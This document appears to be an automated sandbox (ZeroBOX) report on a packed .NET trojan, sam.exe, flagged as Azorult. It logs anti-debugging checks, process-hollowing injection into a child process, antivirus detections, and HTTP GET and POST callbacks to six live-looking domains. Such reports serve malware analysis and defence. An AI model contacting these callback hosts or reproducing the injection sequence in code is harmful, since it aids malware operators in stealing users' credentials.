Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 15, 2021, 10:29 a.m.	July 15, 2021, 10:43 a.m.

Size	899.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`54da6f0e11090728404d0f9807ef3674`
SHA256	`6520c8e7f0f0ad32a8599cffd8d908860f6e0ade6fb41104b31657f8a27a908b`
CRC32	`8F485F59`
ssdeep	`24576:uSwX+mMy3ByqWIZvdwP1DT/q/Xj70LJR2APrcP:A7MIBlWIZ1w9DDYXj7ExrcP`
Yara	Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult IsPE32 - (no description) PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) Admin_Tool_IN_Zero - Admin Tool Sysinternals

sam.exe "C:\Users\test22\AppData\Local\Temp\sam.exe"
2416
- sam.exe "C:\Users\test22\AppData\Local\Temp\sam.exe"
  1572

Name	Response	Post-Analysis Lookup
www.swashbug.com	A 169.1.24.244	169.1.24.244
www.hispekdiamond.com	A 213.171.195.105	213.171.195.105
www.bsbgraphic.com	A 185.10.75.4	185.10.75.4
www.innercritictypes.com	CNAME innercritictypes.com A 34.102.136.180	34.102.136.180
www.keydefi.com	A 88.214.207.96	88.214.207.96
www.rangamaty.com	CNAME rangamaty.com A 54.39.133.15	54.39.133.15

IP Address	Status	Action
164.124.101.2	Active	Moloch
169.1.24.244	Active	Moloch
185.10.75.4	Active	Moloch
213.171.195.105	Active	Moloch
34.102.136.180	Active	Moloch
54.39.133.15	Active	Moloch
88.214.207.96	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 15, 2021, 10:29 a.m.			0	0
IsDebuggerPresent July 15, 2021, 10:29 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (3 events)

Time & API	Arguments	Status	Return
CryptExportKey July 15, 2021, 10:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00687010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2021, 10:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00687010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2021, 10:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00687010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 15, 2021, 10:29 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.innercritictypes.com/uoe8/?Ezu=O21M2FYy2dlMOkCvFyQcwzLn3QEPeqHgQrfKHRI9jw0Ah0TH1lBJi6Gr9K83sGcpR3T5fZkw&q48=Gbt4axj8p
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.bsbgraphic.com/uoe8/?Ezu=IJxsArLTGRxQO+Zr9zHYqepX+MoX/vO+JUx3UoPYs759hqCLjrrubWv7+QNEl9ZR5rIOa5eQ&q48=Gbt4axj8p
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.keydefi.com/uoe8/?Ezu=fjN3+DCycbloadR1JYSjLl4NMX1BWoGvuTOGO0r7qvHasgjoKS6DLTuYNEAj5O9YQwFgCvIr&q48=Gbt4axj8p
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.swashbug.com/uoe8/?Ezu=jbWl/12LOy/8QMol1vq5On9CelmHmR3hJriw/uowHAcnrTs+PcPuE1M21NVN5bXc/q7xGzNj&q48=Gbt4axj8p
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.hispekdiamond.com/uoe8/?Ezu=UhlVi8jJ/XJooZrGm3lJbnFIbsRb97T5i2H1SjZUz4bfHF7iwjurNO0mfht8QkZ52GR+ypPo&q48=Gbt4axj8p
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.rangamaty.com/uoe8/?Ezu=R56IzDXbjiKZQiW1EQwuK2xVQqAmQzk7iKSIY0yKLDzU7Q9+F9pwjIJqWtsinPaIuC7h0Eu6&q48=Gbt4axj8p

Performs some HTTP requests (12 events)

request	POST http://www.innercritictypes.com/uoe8/
request	GET http://www.innercritictypes.com/uoe8/?Ezu=O21M2FYy2dlMOkCvFyQcwzLn3QEPeqHgQrfKHRI9jw0Ah0TH1lBJi6Gr9K83sGcpR3T5fZkw&q48=Gbt4axj8p
request	POST http://www.bsbgraphic.com/uoe8/
request	GET http://www.bsbgraphic.com/uoe8/?Ezu=IJxsArLTGRxQO+Zr9zHYqepX+MoX/vO+JUx3UoPYs759hqCLjrrubWv7+QNEl9ZR5rIOa5eQ&q48=Gbt4axj8p
request	POST http://www.keydefi.com/uoe8/
request	GET http://www.keydefi.com/uoe8/?Ezu=fjN3+DCycbloadR1JYSjLl4NMX1BWoGvuTOGO0r7qvHasgjoKS6DLTuYNEAj5O9YQwFgCvIr&q48=Gbt4axj8p
request	POST http://www.swashbug.com/uoe8/
request	GET http://www.swashbug.com/uoe8/?Ezu=jbWl/12LOy/8QMol1vq5On9CelmHmR3hJriw/uowHAcnrTs+PcPuE1M21NVN5bXc/q7xGzNj&q48=Gbt4axj8p
request	POST http://www.hispekdiamond.com/uoe8/
request	GET http://www.hispekdiamond.com/uoe8/?Ezu=UhlVi8jJ/XJooZrGm3lJbnFIbsRb97T5i2H1SjZUz4bfHF7iwjurNO0mfht8QkZ52GR+ypPo&q48=Gbt4axj8p
request	POST http://www.rangamaty.com/uoe8/
request	GET http://www.rangamaty.com/uoe8/?Ezu=R56IzDXbjiKZQiW1EQwuK2xVQqAmQzk7iKSIY0yKLDzU7Q9+F9pwjIJqWtsinPaIuC7h0Eu6&q48=Gbt4axj8p

Sends data using the HTTP POST Method (6 events)

request	POST http://www.innercritictypes.com/uoe8/
request	POST http://www.bsbgraphic.com/uoe8/
request	POST http://www.keydefi.com/uoe8/
request	POST http://www.swashbug.com/uoe8/
request	POST http://www.hispekdiamond.com/uoe8/
request	POST http://www.rangamaty.com/uoe8/

Allocates read-write-execute memory (usually to unpack itself) (36 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72741000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72742000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00575000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00577000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00851000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:29 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00852000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 15, 2021, 10:30 a.m.	process_identifier: 2416 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dde2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:30 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00853000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:30 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004dd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:30 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004de000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:30 a.m.	process_identifier: 2416 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00854000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:30 a.m.	process_identifier: 2416 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0085a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:30 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:30 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04611000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:30 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04612000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 10:42 a.m.	process_identifier: 1572 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a30000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000c7c00', u'virtual_address': u'0x00002000', u'entropy': 7.456270246014323, u'name': u'.text', u'virtual_size': u'0x000c7af8'}

entropy

7.45627024601

description

A section with a high entropy has been found

entropy

0.888765294772

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 15, 2021, 10:42 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 15, 2021, 10:30 a.m.	process_identifier: 1572 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000260	1	0	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 15, 2021, 10:30 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $Å¥ÄäEÄäEÄäEî²OEÍÄäEî²zEÄäEî²yEÄäERichÄäEPEL³ÌlQà r Ð@@.textPpr ` base_address: 0x00400000 process_identifier: 1572 process_handle: 0x00000260	1	1	0
WriteProcessMemory July 15, 2021, 10:30 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1572 process_handle: 0x00000260	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 15, 2021, 10:30 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $Å¥ÄäEÄäEÄäEî²OEÍÄäEî²zEÄäEî²yEÄäERichÄäEPEL³ÌlQà r Ð@@.textPpr ` base_address: 0x00400000 process_identifier: 1572 process_handle: 0x00000260	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2416 called NtSetContextThread to modify thread in remote process 1572
NtSetContextThread July 15, 2021, 10:30 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4313248 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000025c process_identifier: 1572	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2416 resumed a thread in remote process 1572
NtResumeThread July 15, 2021, 10:30 a.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 1572	1	0	0

Generates some ICMP traffic

File has been identified by 22 AntiVirus engines on VirusTotal as malicious (22 events)

Elastic	malicious (high confidence)
FireEye	Generic.mg.54da6f0e11090728
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
CrowdStrike	win/malicious_confidence_90% (D)
Cyren	W32/MSIL_Kryptik.EUG.gen!Eldorado
Symantec	Scr.Malcode!gdn30
ESET-NOD32	a variant of MSIL/Kryptik.ABYI
APEX	Malicious
Paloalto	generic.ml
Kaspersky	VHO:Trojan.MSIL.Crypt.gen
Avast	Win32:CrypterX-gen [Trj]
Sophos	ML/PE-A
SentinelOne	Static AI - Malicious PE
Gridinsoft	Trojan.Win32.Gen.se!i
Microsoft	Trojan:Win32/Wacatac.B!ml
Rising	Malware.FakePDF/ICON!1.D51A (CLASSIC)
Ikarus	Packed.Win32.Crypt
Fortinet	MSIL/Kryptik.DLO!tr
BitDefenderTheta	Gen:NN.ZemsilF.34796.4m0@aSXqRrg
AVG	Win32:CrypterX-gen [Trj]
Cybereason	malicious.651d67

Executed a process and injected code into it, probably while unpacking (12 events)

Time & API	Arguments	Status	Return
NtResumeThread July 15, 2021, 10:29 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2416	1	0
NtResumeThread July 15, 2021, 10:29 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2416	1	0
NtResumeThread July 15, 2021, 10:29 a.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 2416	1	0
NtResumeThread July 15, 2021, 10:30 a.m.	thread_handle: 0x00000254 suspend_count: 1 process_identifier: 2416	1	0
CreateProcessInternalW July 15, 2021, 10:30 a.m.	thread_identifier: 240 thread_handle: 0x0000025c process_identifier: 1572 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\sam.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\sam.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000260	1	1
NtGetContextThread July 15, 2021, 10:30 a.m.	thread_handle: 0x0000025c	1	0
NtAllocateVirtualMemory July 15, 2021, 10:30 a.m.	process_identifier: 1572 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000260	1	0
WriteProcessMemory July 15, 2021, 10:30 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $Å¥ÄäEÄäEÄäEî²OEÍÄäEî²zEÄäEî²yEÄäERichÄäEPEL³ÌlQà r Ð@@.textPpr ` base_address: 0x00400000 process_identifier: 1572 process_handle: 0x00000260	1	1
WriteProcessMemory July 15, 2021, 10:30 a.m.	buffer: base_address: 0x00401000 process_identifier: 1572 process_handle: 0x00000260	1	1
WriteProcessMemory July 15, 2021, 10:30 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1572 process_handle: 0x00000260	1	1
NtSetContextThread July 15, 2021, 10:30 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4313248 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000025c process_identifier: 1572	1	0
NtResumeThread July 15, 2021, 10:30 a.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 1572	1	0

sam.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All